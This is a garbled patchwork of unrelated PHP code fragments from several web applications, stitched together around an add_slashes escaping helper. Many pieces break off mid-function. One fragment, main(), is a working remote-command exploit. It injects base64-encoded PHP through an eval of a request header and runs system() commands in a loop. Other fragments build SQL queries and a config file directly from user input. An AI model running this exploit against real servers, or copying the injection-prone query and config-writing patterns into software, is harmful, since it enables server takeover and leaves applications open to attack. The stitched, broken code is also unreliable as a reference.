/**
* Метод отображения дополнительных настроек
*
*/
function settingsCase()
{
global $AVE_Template;
if ($_REQUEST['dop']) {
$set = '<?';
foreach ($_REQUEST['GLOB'] as $k => $v) {
switch ($GLOBALS['CMS_CONFIG'][$k]['TYPE']) {
case 'bool':
$v = $v ? 'true' : 'false';
break;
case 'integer':
$v = intval($v);
break;
case 'string':
$v = "'" . add_slashes($v) . "'";
break;
case 'dropdown':
$v = "'" . add_slashes($v) . "'";
break;
default:
$v = "'" . add_slashes($v) . "'";
break;
}
$set .= "\t//" . $GLOBALS['CMS_CONFIG'][$k]['DESCR'] . "\r\n";
$set .= "\tdefine('" . $k . "'," . $v . ");\r\n\r\n";
}
$set .= '?>';
file_put_contents(BASE_DIR . '/inc/config.inc.php', $set);
reportLog($_SESSION['user_name'] . " - изменил дополнительные настройки системы", 2, 2);
}
$AVE_Template->assign('CMS_CONFIG', $GLOBALS['CMS_CONFIG']);
$AVE_Template->assign('content', $AVE_Template->fetch('settings/settings_case.tpl'));
}
function check_admin_login($login_arr)
{
$login_arr = add_slashes($login_arr);
$username = $login_arr[username];
$password = sha1(SALT_VAR . $login_arr[password]);
$roleid = $login_arr[roleid];
// $qry = "select * from admin where username='******' and password='******'";
// $row = mysql_query($qry);
$row = single_row(ADMIN, "*", "roleid='" . $roleid . "' and`username`='" . $username . "' and `password`='" . $password . "'", "id", "desc", "", false);
if ($row != false) {
session_register($_SESSION[Adm_UserId]);
session_register($_SESSION[Adm_RoleId]);
session_register($_SESSION[Adm_Email]);
session_register($_SESSION[Adm_UserNm]);
session_register($_SESSION[Adm_Fname]);
session_register($_SESSION[Adm_Lname]);
$_SESSION[Adm_UserId] = $row[id];
$_SESSION[Adm_RoleId] = $row[roleid];
$_SESSION[Adm_Email] = $row[email];
$_SESSION[Adm_UserNm] = $row[username];
$_SESSION[Adm_Fname] = $row[fname];
$_SESSION[Adm_Lname] = $row[lname];
return true;
} else {
return false;
}
}
public function down()
{
$statement = DBManager::get()->prepare("\n SELECT name FROM `fleximport_tables`\n ");
$statement->execute();
foreach ($statement->fetch(PDO::FETCH_COLUMN, 0) as $table_name) {
DBManager::get()->exec("\n DROP TABLE IF EXISTS `" . add_slashes($table_name) . "`;\n ");
}
DBManager::get()->exec("\n\t DROP TABLE IF EXISTS `fleximport_tables`;\n\t ");
}
/**
* Слешевание (для глобальных массивов)
* рекурсивно обрабатывает вложенные массивы
*
* @param array $array обрабатываемый массив
* @return array обработанный массив
*/
function add_slashes($array)
{
reset($array);
while (list($key, $val) = each($array)) {
if (is_string($val)) {
$array[$key] = addslashes($val);
} elseif (is_array($val)) {
$array[$key] = add_slashes($val);
}
}
return $array;
}
function main()
{
// :)
$web = new phpsploit();
$web->agent('Mozilla Firefox');
// Hey ya :)
head();
// Target
$url = get_p('url', true);
// Proxy options
$prh = get_p('proxhost');
$pra = get_p('proxauth');
// Use a proxy ?
if ($prh) {
// host:ip
$web->proxy($prh);
// Authentication
if ($pra) {
$web->proxyauth($pra);
}
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
$c_sep = "print('{$s_sep}');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while (($cmd = cmd_prompt()) !== false) {
// magic_quotes_gpc bypass
$web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
// Go =]
$web->get($url . 'index.php?fields=' . to_char($final) . ',1');
// Result
$res = explode($s_sep, $web->getcontent());
// Erf
if (!isset($res[1])) {
print "\nFailed";
exit(1);
} else {
if (empty($res[1])) {
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
} else {
print "\n" . $res[1];
}
}
}
return;
}
function upd_rec($tab, $array, $where = "1=1", $disp = false)
{
$array = add_slashes($array);
$qry = "update {$tab} set ";
if (count($array) > 0) {
foreach ($array as $k => $v) {
$qry .= "{$k}='" . $v . "',";
}
}
$qry = trim($qry, ",") . " where " . $where;
if ($disp) {
echo $qry;
}
$err = mysql_query($qry);
if (!$err) {
echo mysql_error() . " - <b>" . $qry . "</b>";
return false;
} else {
return true;
}
}
function add_slashes($string)
{
if (!$GLOBALS['magic_quotes_gpc']) {
if (is_array($string)) {
foreach ($string as $key => $val) {
$string[$key] = add_slashes($val);
}
} else {
$string = addslashes($string);
}
}
return $string;
}
<?php
session_start();
require "base.inc.php";
$data = $_POST;
$data = guolv(add_slashes($data));
switch ($data['action']) {
case 'user_up':
unset($data['action']);
if ($conn->post_update("" . DB_EXT . "user", $data, "kq_uniqueid='" . $_COOKIE['uid'] . "'")) {
echo 'ok';
} else {
echo '';
}
break;
case 'ly_add':
is_login(@$_COOKIE['uid'], 0);
$data['kq_uuid'] = uuid();
$data['kq_ctime'] = time();
$data['kq_ip'] = $_SERVER["REMOTE_ADDR"];
unset($data['action']);
if ($conn->post_insert("" . DB_EXT . "fankui", $data)) {
echo 'ok';
} else {
echo '';
}
break;
case md5('user_add'):
if ($data['chkfrom'] == @$_SESSION['add_input']) {
$user = is_login(@$_COOKIE['uid']);
unset($data['submit']);
$edit_value = $last_name;
break;
case "email":
$value = $email;
$edit_value = $email;
break;
case "alternate email":
$value = $alt_email;
$edit_value = $alt_email;
break;
case "phone":
$value = add_slashes($phone);
$edit_value = $phone;
break;
case "mobile":
$value = add_slashes($mobile);
$edit_value = $mobile;
break;
case "message":
$value = nl2br(ucfirst($message));
$edit_value = $message;
break;
}
echo display_contact($each_set->attribute, $value);
echo generate_input($each_set->form_element, $each_set->options, $each_set->attribute, $each_set->searchable, $each_set->placeholder, $each_set->class_name, $each_set->style_name, $i, $each_set->is_required, $each->title_placeholder, $edit_value, "edit", $salutation);
if ($i == 1) {
?>
<div class="row dispRow">
<div class="column small-2">
<strong class="radius" > E-mail</strong>
</div>
public function show_list($start = NULL, $limit = NULL)
{
try {
$this->data['heading'] = addslashes(t("Manage Admin User"));
//Package Name[@package] Panel Heading
$this->session->unset_userdata('last_uri');
//generating search query//
$arr_session_data = $this->session->userdata("arr_session");
if ($arr_session_data['searching_name'] != $this->data['heading']) {
$this->session->unset_userdata("arr_session");
$arr_session_data = array();
}
$search_variable = array();
//Getting Posted or session values for search//
$s_search = isset($_POST["h_search"]) ? $this->input->post("h_search") : $this->session->userdata("h_search");
$search_variable["s_customer_name"] = $this->input->post("h_search") ? $this->input->post("s_customer_name") : $arr_session_data["s_customer_name"];
//end Getting Posted or session values for search//
$s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1 ";
if ($s_search == "advanced") {
if ($search_variable["s_customer_name"] != "") {
$s_where .= " AND CONCAT(n.s_first_name,' ',n.s_last_name) LIKE '%" . add_slashes($search_variable["s_customer_name"]) . "%' ";
}
$arr_session = array();
$arr_session["searching_name"] = $this->data['heading'];
$arr_session["s_customer_name"] = $search_variable["s_customer_name"];
$this->session->set_userdata("arr_session", $arr_session);
$this->session->set_userdata("h_search", $s_search);
$this->data["h_search"] = $s_search;
$this->data["s_customer_name"] = $search_variable["s_customer_name"];
} else {
$s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1";
//
//Releasing search values from session//
$this->session->unset_userdata("arr_session");
$this->session->unset_userdata("h_search");
$this->data["h_search"] = $s_search;
$this->data["s_customer_name"] = "";
//end Storing search values into session//
}
unset($s_search, $arr_session, $search_variable);
//Setting Limits, If searched then start from 0//
if ($this->input->post("h_search")) {
$start = 0;
} else {
$start = $this->uri->segment($this->i_uri_seg);
}
//end generating search query//
//$this->i_admin_page_limit = 1;
$limit = $this->i_admin_page_limit;
$info = $this->mod_rect->fetch_multi($s_where, intval($start), $limit);
$this->session->set_userdata('last_uri', $start);
//Creating List view for displaying//
$table_view = array();
//Table Headers, with width,alignment//
$table_view["caption"] = addslashes(t("Manage Admin User"));
$table_view["total_rows"] = count($info);
$table_view["total_db_records"] = $this->mod_rect->gettotal_info($s_where);
$table_view["detail_view"] = false;
// to disable show details.
$j = 0;
$table_view["headers"][$j]["width"] = "30%";
$table_view["headers"][$j]["align"] = "left";
$table_view["headers"][$j]["val"] = addslashes(t("Name"));
$table_view["headers"][++$j]["val"] = addslashes(t("Email"));
$table_view["headers"][$j]["width"] = "25%";
$table_view["headers"][$j]["align"] = "left";
/*$table_view["headers"][++$j]["val"] = addslashes(t("User Type"));
$table_view["headers"][$j]["width"] ="20%";
$table_view["headers"][$j]["align"] ="left";*/
$table_view["headers"][++$j]["val"] = addslashes(t("Status"));
$table_view["headers"][$j]["width"] = "10%";
$table_view["headers"][$j]["align"] = "left";
//end Table Headers, with width,alignment//
//Table Data//
for ($i = 0; $i < $table_view["total_rows"]; $i++) {
$i_col = 0;
$table_view["tablerows"][$i][$i_col++] = encrypt($info[$i]["i_id"]);
$table_view["tablerows"][$i][$i_col++] = $info[$i]["s_first_name"] . ' ' . $info[$i]["s_last_name"] . '<br>(Username: '******')';
$table_view["tablerows"][$i][$i_col++] = $info[$i]["s_email"];
//$table_view["tablerows"][$i][$i_col++] = $info[$i]["s_user_type"];
if ($info[$i]["i_status"] == 1) {
$table_view["tablerows"][$i][$i_col++] = '<span class="label label-success" id="status_row_id_' . $info[$i]["i_id"] . '">Active</span>';
} else {
$table_view["tablerows"][$i][$i_col++] = '<span class="label label-default" id="status_row_id_' . $info[$i]["i_id"] . '">Inactive</span>';
}
$action = '';
if ($info[$i]["i_status"] == 1) {
$action .= '<a data-toggle="tooltip" data-placement="bottom" title="Make Inactive" class="glyphicon glyphicon-ok" id="approve_img_id_' . $info[$i]["i_id"] . '_inactive" href="javascript:void(0);" rel="make_inactive"></a>';
} else {
$action .= '<a data-toggle="tooltip" data-placement="bottom" title="Make Active" class="glyphicon glyphicon-ban-circle" id="approve_img_id_' . $info[$i]["i_id"] . '_active" href="javascript:void(0);" rel="make_active"></a>';
}
if ($action != '') {
$table_view["rows_action"][$i] = $action;
}
}
//end Table Data//
unset($i, $i_col, $start, $limit);
$this->data["table_view"] = $this->admin_showin_table($table_view, TRUE);
//Creating List view for displaying//
$this->data["search_action"] = $this->pathtoclass . $this->router->fetch_method();
//used for search form action
//echo $this->data["search_action"];
$this->render();
unset($table_view, $info);
} catch (Exception $err_obj) {
show_error($err_obj->getMessage());
}
}
$database_name = $_POST['database_name'];
}
// Get table prefix
// Find out if the user wants to install tables and data
if (isset($_POST['install_tables']) && $_POST['install_tables'] == 'true') {
$install_tables = true;
} else {
$install_tables = false;
}
// End database details code
// Begin company name code
// Get company name
if (!isset($_POST['company_name']) || $_POST['company_name'] == '') {
set_error('Please enter a company name');
} else {
$company_name = add_slashes($_POST['company_name']);
}
// End website company name
// Check if the user has entered a correct path
if (!file_exists(accounting_scheme())) {
set_error('It appears the accounting scheme does not exist');
}
// Get admin email and validate it
if (!isset($_POST['admin_email']) || $_POST['admin_email'] == '') {
set_error('Please enter an email for the Administrator account');
} else {
if (eregi("^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}\$", $_POST['admin_email'])) {
$admin_email = $_POST['admin_email'];
} else {
set_error('Please enter a valid email address for the Administrator account');
}
require_once FUN_PATH . "global.func.inc.php";
require_once CLASS_PATH . "class_alert.inc.php";
/*
传入类型
*/
if (isset($_POST['type'])) {
$type = $_POST['type'];
} else {
exit("非法操作");
}
$passarray = array(md5("weijintai"), md5("index_add"));
//是否追加"//"
if (in_array($type, $passarray)) {
$data = $_POST;
} else {
$data = add_slashes($_POST);
}
//为空的取消
foreach ($data as $key => $value) {
if (is_array($value)) {
$data[$key] = $value;
} else {
if ($value) {
$data[$key] = trim($value);
} elseif ($value == '') {
unset($data[$key]);
}
}
}
switch ($type) {
/*管理员权限添加*/
function my_serialize($data)
{
return add_slashes(serialize(del_slashes($data)));
}
define('TOA_ROOT', str_replace('\\', '/', substr(dirname(__FILE__), 0, -7)));
define('CACHE_ROOT', TOA_ROOT . 'cache/');
define('PHP_TIME', time());
@header("content-Type: text/html; charset=utf-8");
$mtime = explode(' ', microtime());
$starttime = $mtime[0] + $mtime[1];
require TOA_ROOT . 'include/function_cache.php';
require TOA_ROOT . 'include/function_version.php';
require TOA_ROOT . 'include/function_global.php';
define('template', TOA_ROOT . 'template/default/');
if (!get_magic_quotes_gpc()) {
$_GET = add_slashes($_GET);
$_POST = add_slashes($_POST);
$_COOKIE = add_slashes($_COOKIE);
}
$_FILES = add_slashes($_FILES);
!$_SERVER['PHP_SELF'] && ($_SERVER['PHP_SELF'] = $_SERVER['SCRIPT_NAME']);
$superadmin = '';
require TOA_ROOT . 'config.php';
require TOA_ROOT . 'include/class_mysql.php';
require TOA_ROOT . 'include/class_user.php';
require TOA_ROOT . 'include/class_config.php';
require TOA_ROOT . 'include/function_common.php';
require TOA_ROOT . 'include/excel_writer.class.php';
require TOA_ROOT . 'include/class_Utility.php';
require TOA_ROOT . 'include/class_ugcode.php';
require TOA_ROOT . 'include/sms.class.php';
require TOA_ROOT . 'include/class_ads.php';
require TOA_ROOT . 'include/word.class.php';
$db = new Mysql();
$db->connect(DB_HOST, DB_USER, DB_PWD, DB_NAME, DB_PCONNECT);
$database_name = $_POST['database_name'];
}
// Get table prefix
if (preg_match('/[^a-z0-9_]+/i', $_POST['table_prefix'])) {
// contains invalid characters (only a-z, A-Z, 0-9 and _ allowed to avoid problems with table/field names)
set_error('Only characters a-z, A-Z, 0-9 and _ allowed in table_prefix.', 'table_prefix');
} else {
$table_prefix = $_POST['table_prefix'];
}
$install_tables = true;
// Begin website title code
// Get website title
if (!isset($_POST['website_title']) or $_POST['website_title'] == '') {
set_error('Please enter a website title', 'website_title');
} else {
$website_title = add_slashes($_POST['website_title']);
}
// End website title code
// Begin admin user details code
// Get admin username
if (!isset($_POST['admin_username']) or $_POST['admin_username'] == '') {
set_error('Please enter a username for the Administrator account', 'admin_username');
} else {
$admin_username = $_POST['admin_username'];
}
// Get admin email and validate it
if (!isset($_POST['admin_email']) or $_POST['admin_email'] == '') {
set_error('Please enter an email for the Administrator account', 'admin_email');
} else {
if (preg_match('/^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$/i', $_POST['admin_email'])) {
$admin_email = $_POST['admin_email'];
function add_slashes($data)
{
foreach ($data as $key => $value) {
if (is_array($value)) {
add_slashes($value);
} else {
if (!get_magic_quotes_gpc()) {
$data[$key] = addslashes($value);
} else {
$data[$key] = $value;
}
}
}
return $data;
}
/**
* Creates a "SELECT FROM `table` WHERE .. conditions .." and returns the query results;
* $conditions format: id=15&some_field='value' or as an array: array('id' => 15, 'some_field' => 'value')
* $more_sql e.q. "ORDER BY id DESC"
*
* @param string $table
* @param mixed $conditions
* @param string $select_fields
* @param string $more_sql
* @return array
*/
function sqlSelectAll($table, $conditions = 1, $select_fields = '*', $more_sql = '')
{
$where = [];
if (is_array($conditions)) {
foreach ($conditions as $field => $value) {
if ($this->_auto_add_slashes && is_string($value)) {
$value = add_slashes($value);
}
$value = is_string($value) ? "'" . $value . "'" : $value;
$where[] = "`{$field}`={$value}";
}
} else {
$where = explode('&', $conditions);
}
// build the query
$query = "SELECT {$select_fields} FROM {$table} WHERE " . join(" AND ", $where) . " " . $more_sql;
return $this->sqlFetchAll($query);
}